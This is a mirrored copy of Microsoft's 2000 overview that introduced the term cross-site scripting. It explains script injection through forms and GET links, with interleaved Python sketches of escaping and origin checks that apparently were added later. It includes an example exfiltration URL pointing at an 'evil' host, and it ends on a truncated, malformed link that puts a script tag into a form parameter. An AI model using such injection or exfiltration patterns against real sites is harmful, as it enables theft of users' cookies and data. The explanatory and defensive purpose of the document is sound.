Cross-site Scripting Overview


This is a historical document that describes the origins of Cross-site Scripting as a commonly accepted term. It exists here only as a historical reference. Because it is an important historical document, it is mirrored here, where I hope it will exist well into the future. Supplemental information is available from CERT and from Apache.

Cross-site Scripting Overview 

Originally Posted: February 2, 2000 

David Ross - Microsoft 
Ivan Brugiolo - Microsoft 
John Coates - Microsoft 
Microsoft - Microsoft 
Michael Roe - Microsoft Research 

Abstract 

A security issue has come to Microsoft's attention that
we refer to as cross-site scripting. This is not an
entirely new issue; elements of the information we
present have been known for some time within the
software development community. However, the overall
scope of the issue is larger than previously understood,
both in terms of the breadth of the problem and the risk
that it presents. It is important to explore the issue more
comprehensively due to the current growth and
complexity of the Web. 

1. The Problem 

Web pages contain both text and HTML markup that is
generated by the server and interpreted by the client.
Servers that generate static pages have full control over
how the client will interpret the pages the server sends.
However, servers that generate dynamic pages do not
have control over how their output is interpreted by the
client. The heart of the cross-site scripting security issue
is that if untrusted content can be introduced into a
dynamic page, neither the server nor the client has
enough information at hand to recognize that this has
happened and take protective actions. 

In HTML, to distinguish text from markup, some characters
are treated specially. The grammar of HTML determines
the significance of special characters; different
characters are special at different points in the document.
For example, the less-than sign (<) typically indicates the
beginning of an HTML tag. Tags can either affect the
formatting of the page or introduce a program that the
browser executes (e.g. the <SCRIPT> tag introduces a
JavaScript program). The fact that HTML can contain
programs written in scripting languages such as JavaScript
is another critical component of the cross-site scripting
issue. 

Many Web servers generate Web pages dynamically. For
example, a search engine may perform a database search
and then construct a Web page that contains the result
of the search. Any server that creates Web pages by
inserting dynamic data into a template should check to
make sure that the data to be inserted does not contain
any special characters (e.g. <). If the inserted data
contains special characters, the user's Web browser will
mistake them for HTML markup. As HTML markup can
introduce programs, some data values, given the correct
syntax, could be run as programs by the browser rather
than being displayed as text. A large number of servers
that dynamically generate Web pages don't check for
special characters, or don't do it correctly (e.g. they only
check some special characters, and neglect to check
others). 
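
As a minimal sketch of the check described above, the following Python fragment inserts the same data into a page twice: once as-is, and once after converting special characters to character references. The original document does not name a language; the template and the function names are hypothetical and chosen only for illustration. The escaping itself is done by the standard library function `html.escape`.

```python
import html

# Hypothetical page template; {query} marks where dynamic data is inserted.
TEMPLATE = "<html><body><p>Results for: {query}</p></body></html>"


def render_unsafe(query: str) -> str:
    """Insert the data as-is, so special characters reach the browser as markup."""
    return TEMPLATE.format(query=query)


def render_escaped(query: str) -> str:
    """Escape &, <, > and quotes so the browser displays the data as text."""
    return TEMPLATE.format(query=html.escape(query, quote=True))


if __name__ == "__main__":
    data = "<script>/* attacker-chosen program */</script>"
    print(render_unsafe(data))   # the <script> tag survives as markup
    print(render_escaped(data))  # the tag is rendered harmless as &lt;script&gt;...
```

This sketch only covers data placed in ordinary element content. Because different characters are special at different points in the document, data inserted elsewhere (for example inside an attribute value or a script block) would likely need a different encoding.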

The risk of a Web server not doing a check for special
characters in dynamically generated Web pages is this: If
an attacker can choose the data that the Web server
inserts into the generated page, then the attacker can
trick the user's browser into running a program of the
attacker's choice. This program will execute in the
browser's security context for communicating with the
victim Web server, not the browser's security context for
communicating with the attacker. Thus, the program will
execute in an inappropriate security context with
inappropriate privileges. A variation involving HTML forms
gives the attacker an easy way to perform this attack. 

1.1 The attack without forms 

Internet-based e-mail services and Web bulletin board
systems have understood specific instances of this
problem for quite some time. If a Web server takes data
provided by one person and uses it to construct a Web
page served to another, then the attack is obvious: the
attacker writes the script they want the victim to run,
then tells the Web server to send it to the victim. This
simple version of the attack could potentially affect any
Web-based chat room. The chat-room server provides
a client-to-client messaging service. User X can send user
Y a program that, when executed, sends a message to user
Z. The upshot of this attack is that X can potentially trick
Y into sending a message to Z, even if Y would never
have intentionally sent that message to Z. 

The effect of this exploit within the context of
client-to-client communications facilitated by a server is
widely recognized. Responsible Web site administrators
understand the need to prevent this scenario. However,
variants of the problem exist in other contexts as well,
and these are much less well understood. 

1.2 The attack using forms 

The security problem with HTML forms is that when a Web
server receives a completed form from a user agent it
can't tell where it came from. The URL to which the
completed form should be posted is part of the form. Two
forms can both specify the same posting URL. They do
not have to be on the same Web site; a form on an
attacker's Web site can indicate to the browser that the
completed form should be posted to a completely different
Web site. 

Completed forms do not distinguish between data supplied
by the user and data supplied by the source of the form
before the user filled it in. An attacker can create a
modified version of a Web site's form, one in which
certain fields that normally would be filled in by the user
are instead fixed in advance by the attacker. 
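
The point that a completed form carries no record of who chose each value can be illustrated with a small Python sketch. The `Field` class, its `preset` flag, and the field name `id` are hypothetical; the encoding uses the standard library function `urllib.parse.urlencode`, which produces the usual `application/x-www-form-urlencoded` format.

```python
from dataclasses import dataclass
from typing import Iterable
from urllib.parse import urlencode


@dataclass
class Field:
    name: str
    value: str
    preset: bool  # True if the form's author fixed the value in advance


def encode_submission(fields: Iterable[Field]) -> str:
    """Encode a completed form for submission.

    Only names and values are transmitted; the `preset` flag has no
    representation in the encoded data, so the server never sees it.
    """
    return urlencode([(f.name, f.value) for f in fields])


if __name__ == "__main__":
    typed_by_user = [Field("id", "42", preset=False)]
    fixed_by_form_author = [Field("id", "42", preset=True)]
    # Both submissions are byte-for-byte identical on the wire.
    print(encode_submission(typed_by_user))
    print(encode_submission(fixed_by_form_author))
```

Under these assumptions, the receiving server has nothing in the submitted data that it could use to tell the two cases apart.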

The attack proceeds as follows: 

     1. The attacker first identifies a Web site that will
        accept a filled-in form and reply with a Web page
        containing data taken from the form, without
        checking for special characters.
     2. The attacker then creates their own form, on their
        own Web site, with the form's posting URL set to
        the victim Web server.
     3. One of the fields is specified so that the victim Web
        server's reply contains a program that will be
        executed by the browser.
     4. The attacker then entices a user into submitting the
        form. The attacker can make submitting the form
        indistinguishable from following a normal link, so all
        that is needed is for the attacker to be able to
        entice the user into following a link.
     5. Upon receiving the reply from the victim Web
        server, the user's browser will execute the program
        inside the reply.

Why is this an attack? Why is it any different from the
attacker's Web site sending the user a Web page
containing a program? The difference is in the apparent
source of the program. The actions a program is allowed
to perform depend on where it came from. The user can
define some Web sites as trusted (i.e. programs from
them are allowed to perform potentially unsafe
operations, in the belief that they will not do so
maliciously), while others are not trusted (i.e. programs
from them should not be allowed to perform these
operations). This attack enables an untrusted Web site to
convince the browser that a program has come from a
trusted Web site. 
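
The notion of the "apparent source" of a program can be sketched as follows. This is an illustration under a stated assumption, not a description of any particular browser: it treats the source of a page as the scheme, host, and port of the URL it was retrieved from, which is a simplification in the spirit of the browser same-origin model and is not spelled out in the original text. The host names and the helper `apparent_source` are hypothetical.

```python
from urllib.parse import urlsplit

# Default ports for the schemes used in this sketch.
DEFAULT_PORTS = {"http": 80, "https": 443}


def apparent_source(url: str) -> tuple:
    """Return (scheme, host, port) for the URL a page was retrieved from."""
    parts = urlsplit(url)
    port = parts.port or DEFAULT_PORTS.get(parts.scheme)
    return (parts.scheme, parts.hostname, port)


# Hypothetical URLs: the attacker's own page, and the victim server's reply
# to the form that the attacker's page caused the browser to submit.
attacker_page = "http://www.attacker.example/lure.html"
victim_reply = "http://www.victim.example/form.asp?id=PAYLOAD"

if __name__ == "__main__":
    # A script embedded in the reply is attributed to the victim site,
    # even though the attacker chose its text.
    print(apparent_source(victim_reply))
    print(apparent_source(attacker_page))
```

In this model the browser's trust decision depends only on where the reply came from, which is why a program echoed back by the victim server inherits that server's privileges.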

When the user interacts with several Web sites, these
interactions should be isolated from each other. Web site
X should not be able to monitor or interfere with a user's
interactions with Web site Y, even if the user is talking to
both sites at the same time. This attack breaks through
this security barrier. Server X may interfere with the
user's communication with server Y, as server X gains
control over a script the user runs to communicate with
Y. 

1.3 Consequences of the attack 

     - Assuming that a particular Web server is vulnerable
       to cross-site scripting attacks, the attacker can run
       a script in the wrong security context. This means
       that cookies can be read; locked-down plug-ins or
       native code can be instantiated and scripted with
       untrusted data; user input may be intercepted. Any
       Web browser supporting scripting is potentially
       vulnerable, as is any Web server that supports
       HTML forms. HTTPS is not immune.
     - Data gathered by the malicious script can be sent
       back to the attacker's Web site. For example, if the
       script has used the DHTML object model to extract
       data from a page, then it can send it to the
       attacker by fetching a URL of the following form:

       www.[evil].com/Collect.asp?data=1234567890123456

     - As long as the user navigates within a given domain,
       a robust exploit script can follow the user.
     - This attack can be used against machines behind
       firewalls. Many corporate local area networks are
       configured so that client machines trust servers on
       the LAN but do not trust servers on the outside
       Internet. However, a server outside a firewall can
       fool a client inside the firewall into believing that a
       trusted server inside the firewall has asked it to
       execute a program. To do this, all the attacker
       needs is a Web server inside the firewall that
       doesn't check fields in forms for special characters.
     - Only one page on one Web server in a domain is
       required to compromise the entire domain. This is
       true even if the vulnerable Web server doesn't hold
       any important data: it can still be used as part of
       an attack on other machines within the same
       domain. All Web servers should guard against this
       attack, even ones that don't perform critical tasks.

The need to validate all inputs rather than blindly using
them is familiar to the software development community,
including seasoned Web developers. However, this
guidance is infrequently followed by the Web developer
community at large, as evidenced by the large number of
Web sites that are vulnerable to this attack. We believe
this situation results in part because the full scope of the
damage that can be caused via such an attack has not
been well understood. Our intent is to highlight proper
Web site coding practices that, when implemented
correctly, serve to block this vulnerability. 

Please refer to Appendix A for some detailed code
samples of how an attack might appear in dynamically
generated HTML output and some suggestions for
preventing untrusted input from being written to output.

1.4 The attack with HTTP GET 

The Web provides two different mechanisms for submitting
forms: GET and POST. In the GET method, the
content of the form is used to construct a URL, which the
browser then retrieves. The Web server interprets a
request for that URL as a submission of the form. 

This attack works using both the GET and POST
methods. However, it is especially easy with the GET method,
as the user does not need to be aware that they are
submitting a form. The attacker just needs to entice the
user into following a link. As far as the user is concerned,
they are just retrieving a Web page. But the victim Web
server will think that the user is submitting a form,
because they have asked for a special URL. 
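
The relationship between a GET form submission and an ordinary link can be sketched in Python. The host name, the field name `id`, and both helper functions are hypothetical; the encoding and decoding use `urlencode`, `urlsplit`, and `parse_qs` from the standard `urllib.parse` module. The field value here is harmless markup chosen only to show that special characters survive the round trip.

```python
from urllib.parse import parse_qs, urlencode, urlsplit

# Hypothetical form action on the victim Web server.
ACTION = "http://www.victim.example/form.asp"


def get_submission_url(action: str, fields: dict) -> str:
    """Build the URL a browser retrieves when a GET form is submitted."""
    return action + "?" + urlencode(fields)


def fields_seen_by_server(url: str) -> dict:
    """Decode the query string back into form fields, as a server would."""
    query = urlsplit(url).query
    return {name: values[0] for name, values in parse_qs(query).items()}


if __name__ == "__main__":
    url = get_submission_url(ACTION, {"id": "<b>text</b>"})
    print(url)  # special characters are percent-encoded in the URL
    print(fields_seen_by_server(url))  # the server recovers them unchanged
```

A link that points at this URL produces the same request as submitting the form, so percent-encoding in transit offers no protection by itself: the server still receives the special characters and has to check for them before writing the value into a page.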

It is not necessary to create a Web site in order to carry
out the GET version of this attack. The URL can be sent
in a mail message or posted to a USENET news group.
Examine the following HTML link: 

<a class=www.[foo].com/form.asp?
id=<script src="/img/spacer.gif"> 